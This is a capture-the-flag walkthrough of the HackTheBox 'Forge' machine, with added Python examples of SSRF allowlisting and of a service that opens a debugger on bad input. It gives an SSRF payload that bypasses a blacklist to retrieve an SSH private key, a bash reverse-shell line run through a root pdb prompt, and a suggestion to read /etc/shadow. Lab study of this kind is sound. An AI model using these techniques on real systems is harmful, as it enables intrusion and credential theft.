In this post, I would like to share a walkthrough of the Forge machine from HackTheBox.

This machine is rated medium difficulty on HackTheBox.

Source: Hack the Box

What will you gain from the Forge machine?

For the user flag, you will exploit an SSRF vulnerability on the website to fetch useful information from the server.

As for the root flag, you need to run Python code from a PDB (Python debugger) prompt reached through the SUID file.

Information Gathering

Once the VPN connection (using the configuration file downloaded from HackTheBox) is established, we can start information gathering on the machine by running nmap -sC -sV -p- <IP Address> -Pn

# Nmap 7.91 scan initiated Sat Sep 11 23:31:29 2021 as: nmap -sV -sC -oA intial -Pn
Nmap scan report for
Host is up (0.19s latency).
Not shown: 997 closed ports
21/tcp filtered ftp
22/tcp open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 4f:78:65:66:29:e4:87:6b:3c:cc:b4:3a:d2:57:20:ac (RSA)
|   256 79:df:3a:f1:fe:87:4a:57:b0:fd:4e:d0:54:c6:28:d9 (ECDSA)
|_  256 b0:58:11:40:6d:8c:bd:c5:72:aa:83:08:c5:51:fb:33 (ED25519)
80/tcp open     http    Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://forge.htb
Service Info: Host:; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
# Nmap done at Sat Sep 11 23:32:11 2021 -- 1 IP address (1 host up) scanned in 42.51 seconds

The scan shows the following ports of interest (21 is filtered, 22 and 80 are open):

  • 21 – ftp
  • 22 – ssh
  • 80 – http

Let’s visit the website.

Source: Forge Website interface

Nothing of interest here except the “Upload an Image” link.

Before using “Upload an Image”, let’s enumerate the directories on the main domain.

However, no interesting directory turns up.

The “Upload an Image” page offers two functions: Upload local file and Upload from URL.

I tried uploading a few random files and received the responses shown above.

After a while, I managed to get a useful file from forge.htb/announcement.

We have the link, so let’s download the file to our machine.

The file gives us a lot of information, including credentials and a list of ports stated to be open on the machine.

I tried to access the machine via FTP, but sadly it was a dead end.

I was stuck on the FTP access for a while and suspected there might be a subdomain for the machine, so let’s enumerate subdomains (if any) with gobuster’s vhost mode.

After a few minutes, admin.forge.htb shows up with a status 200.

Sadly, it only returns the text “Only localhost is allowed!”, so we are stuck again.

Gaining Privileges Access

In the Burp Suite request for the Upload function, I notice that there’s some code ( after SoC-GPC

Let’s do some research on the attack, which I believe is an SSRF attack.

Source: What is SSRF (Server-side request forgery)? Tutorial & Examples | Web Security Academy

Let’s review what we have obtained so far:

  • Subdomain: admin.forge.htb (only localhost is allowed)
  • ftp, ftps, http and https are open on the machine for localhost
  • Credentials: username=user, password=heightofsecurity123!

SSRF attack on forge.htb

Let’s apply what we learned about SSRF to the website’s upload request in Burp Suite.

We can insert the payload in the form field as shown above.

The payload would be something like http://admin.FORGE.HTB/upload?u=ftp://user:heightofsecurity123!@ (where I try to obtain the SSH id_rsa)

From the intercepted request in Burp Suite, we move to Repeater to understand the flow of the process. However, the server responds with the error “URL contains a blacklisted address!”

Let’s try changing the case of the subdomain to ADMIN.FORGE.htb and using other representations of localhost such as

Voila! Finally, we get a link to download a file from the machine.

Let’s retrieve the file using wget so that we can read its content.

After multiple tries, we retrieve the SSH id_rsa key.

Let’s log in to the machine over SSH using the id_rsa key we just obtained.
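The error “URL contains a blacklisted address!” and the fact that a case change in the hostname gets past it tell us what the check on the server looks like: a string match on the raw URL. The following is an added example, not code from the original post or from the Forge machine itself, that puts that naive blacklist beside an allowlist check on the parsed and normalised URL. NAIVE_BLACKLIST, ALLOWED_HOSTS and the sample URLs are constructed for the demonstration; the hardened check also rejects the non-http schemes and embedded credentials that the payload above relies on.

```python
# Added example (not part of the original write-up or the Forge machine's code).
# Contrasts a substring blacklist, which 'admin.FORGE.HTB' slips past, with an
# allowlist applied to the parsed, normalised URL.  All lists are constructed.
import ipaddress
from typing import Tuple
from urllib.parse import urlsplit

# Constructed blacklist in the spirit of "URL contains a blacklisted address!"
NAIVE_BLACKLIST = ("localhost", "127.0.0.1", "admin.forge.htb")

# Constructed allowlist of hosts the image fetcher is supposed to talk to.
ALLOWED_HOSTS = {"images.example.com", "cdn.example.com"}
ALLOWED_SCHEMES = {"http", "https"}


def naive_is_blocked(url: str) -> bool:
    """Substring match on the raw URL string.

    Hostnames are case-insensitive, so 'admin.FORGE.HTB' names the same host
    as 'admin.forge.htb' yet contains none of the blacklisted strings.
    """
    return any(bad in url for bad in NAIVE_BLACKLIST)


def _is_internal_ip(host: str) -> bool:
    """True if host is an IP literal in a loopback, private, link-local,
    unspecified or reserved range.  Non-literal hostnames return False."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_unspecified or ip.is_reserved)


def hardened_check(url: str) -> Tuple[bool, str]:
    """Allowlist check on parsed components.  Returns (allowed, reason)."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"            # ftp://, file://, gopher:// ...
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL not allowed"
    host = parts.hostname                             # lowercased, brackets stripped
    if not host:
        return False, "no host"
    if _is_internal_ip(host):
        return False, "internal address"              # 127.0.0.1, [::1], 0.0.0.0, 10/8 ...
    if host not in ALLOWED_HOSTS:
        return False, "host not in allowlist"         # also catches 127.1, 2130706433 ...
    return True, "ok"


if __name__ == "__main__":
    for sample in ("http://admin.forge.htb/upload", "http://admin.FORGE.HTB/upload",
                   "http://[::1]/", "https://cdn.example.com/a.png"):
        print(sample, "naive blocked:", naive_is_blocked(sample),
              "hardened:", hardened_check(sample))
```

The allowlist is what does the work: shortened and numeric forms of 127.0.0.1 that ipaddress refuses to parse still fail simply because they are not on the list. A string check alone is still not enough for a real fetcher, which must also check the address the hostname resolves to at connection time and must not follow redirects blindly, since a DNS answer or a 302 can point an allowed name back at localhost.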

Maintaining Privileges Access on Forge Machine

At last, we are able to access the machine.

You can read the user flag by typing the “cat user.txt” command.

Escalate to Root Privileges Access

In order to escalate to root, we need to find a SUID file that we can abuse. To find it, we can run a simple command such as “sudo -l”.

We need to understand the SUID file by reading its contents. I notice there’s a password (secretadminpassword) that we might use later.

Without further ado, let’s run the SUID file. I notice the output looks a lot like nc.

There might be a way to get a response from it.

Let’s open another SSH session in a different terminal.

We can telnet to localhost on the port given by the SUID file. Oh wow! It works, and it asks for the secret password, which might be the password we found inside the SUID file.

Gotcha! Now let’s enter any character that is not among the listed options.

We get a response from the SUID file. From my experience, PDB might be the Python debugger.

However, it doesn’t do any harm to double-check on the internet.

It’s the Python debugger, as I expected.

Before executing any Python code in PDB, we need to start our nc listener.

Let’s run a simple piece of Python code that sends a reverse shell back to us.

For instance, the code can be seen below:

# <Your IP> and <Port> are the address and port of the nc listener started above
import os
os.system("bash -c 'bash -i >& /dev/tcp/<Your IP>/<Port> 0>&1'")

Success! We now have a root reverse shell.

As usual, we can read the root flag by executing the “cat /root/root.txt” command.
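What made this escalation possible is the design of the service rather than any bug in pdb: a root-owned program that falls into an interactive debugger on unexpected input hands a Python prompt to whoever is connected. The following is an added example, not code from the original post or from the script on the Forge machine, showing that pattern next to the hardened form of the same handler. The command names, messages and the debugger hook parameter are constructed for the demonstration.

```python
# Added example (not from the original write-up or the Forge machine's script).
# A tiny command handler in the style of the root-owned service in this post:
# first the dangerous form that drops into pdb on an unexpected input, then the
# hardened form that validates, logs and never opens a debugger.
import logging
import pdb

log = logging.getLogger("forge-demo")

# Constructed command table standing in for the service's menu.
COMMANDS = {
    "version": lambda: "demo service 1.0",
    "status": lambda: "ok",
}


def handle_unsafe(line: str, debugger=pdb.post_mortem) -> str:
    """Dangerous pattern: any exception hands the caller an interactive debugger.

    pdb.post_mortem() opens a prompt on the process's own stdin/stdout, so a
    client that reaches it can run arbitrary Python as the service user (root,
    when the service runs as root).  The debugger hook is a parameter only so
    the function can be exercised without actually blocking on a pdb prompt.
    """
    try:
        return COMMANDS[line.strip()]()
    except Exception:
        debugger()  # KeyError on an unknown command lands here
        return "debugger exited"


def handle_safe(line: str) -> str:
    """Hardened: validate before dispatch, log failures, never open a debugger."""
    name = line.strip()
    if name not in COMMANDS:
        log.warning("rejected unknown command %r", name)
        return "error: unknown command"
    try:
        return COMMANDS[name]()
    except Exception:
        # Stack trace goes to the log for the operator, not to the client.
        log.exception("command %r failed", name)
        return "error: internal failure"


if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO)
    for line in ("status", "bogus"):
        print(line, "->", handle_safe(line))
```

The two functions differ only in the except branch, which is the whole point: on a box like Forge the interesting finding for a defender is a debugger reachable over a local port from a process running as root, and the fix is to remove the post-mortem hook from production code (or gate it behind an explicit developer-only flag), rather than to change the password the menu asks for.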


Happy Learning Guys!

Extra Information

We can read /etc/shadow so that we can unlock and read the official write-up.
